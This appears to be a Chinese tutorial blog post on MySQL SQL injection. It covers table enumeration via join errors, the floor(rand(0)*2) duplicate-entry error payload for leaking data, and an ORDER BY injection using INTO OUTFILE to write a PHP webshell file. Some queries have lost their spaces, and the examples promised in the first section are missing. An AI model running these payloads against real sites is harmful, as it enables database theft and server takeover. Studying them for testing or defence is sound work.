来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 0x1mysql报错模式下的不使用information_schema来爆表基础知识:USING用于表连接时给定连接条件,Select*fromtable1jointable2ontable1.id=table2.id;使用using可以写为Select*fromtable1jointable2using(id)(......
0x1 mysql报错模式下的不使用information_schema来爆表 基础知识:USING 用于表连接时给定连接条件,Select * from table1 join table2 on table1.id = table2.id;使用using可以写为Select *from table1 join table2 using(id)(不过下面的语句我用on A.user=B.user时不会出现想要的结果) 这里说是要有一个别名,那么如下写就可以了: 又提示说是重复的列Host,那么我们用Host来连接两个表。可见有爆出User表 … 那么接下来就可以爆出数据库中的所有的表了,当然也可以爆其他的。
0x2
select 1 from(selectcount(*),concat(version(),floor(rand(0)*2))x from information_schema.tablesgroup by x)a;
RAND(N) :返回在范围0到1.0内的随机浮点值。如果一个整数参数N被指定,它被用作种子值。每个种子产生的随机数序列是不同的 Floor():向下舍入为最接近的整数。 其实这个select语句最重要的部分是: selectcount(*),concat(version(),floor(rand(0)*2))x from information_schema.tablesgroup by x; 下面将语句拆开查看 select count(*) from information_schema.tables;#只返回一行数据 selectconcat(version(),floor(rand(0)*2))x from information_schema.tables;#返回62行数据 selectconcat(version(),floor(rand(0)*2))x from information_schema.tables group by x;#返回两行数据,这个和rand(0)*2)后面的2有关,乘以n一般就是返回n行数据。 原因应该可以从上面找出点猫腻。第一个select语句有1列,第二个有62列,floor(rand(0)*2)说明可以有两个分组,而第二个分组就无法进行了,所以出现如上“Duplicate entry '5.0.90-community-nt1' for key 1”错误。现在看想出这个利用方法的人真是牛x。 这个语句用处还是很大的,在insert、order by的注入点上还是很有用的。 0x3 select user from userorder by if(( select 'abc' into outfile 'c:/1.php'),1,1); 可见这条语句将user表中user字段都写到1.php文件里面了,但是abc没有写进去。具体原因还没找出来。这里我们可以假设一个yy的场景,root权限+可以发表文章(或者提交的数据被写入到数据库中)+order by的注入点,那么我就可以通过上面的语句来导出一句话。 0x4 参考 http://www.blackhat.com/presentations/bh-usa-09/DZULFAKAR/BHUSA09-Dzulfakar-MySQLExploit-PAPER.pdf http://www.exploit-db.com/papers/13604/ http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com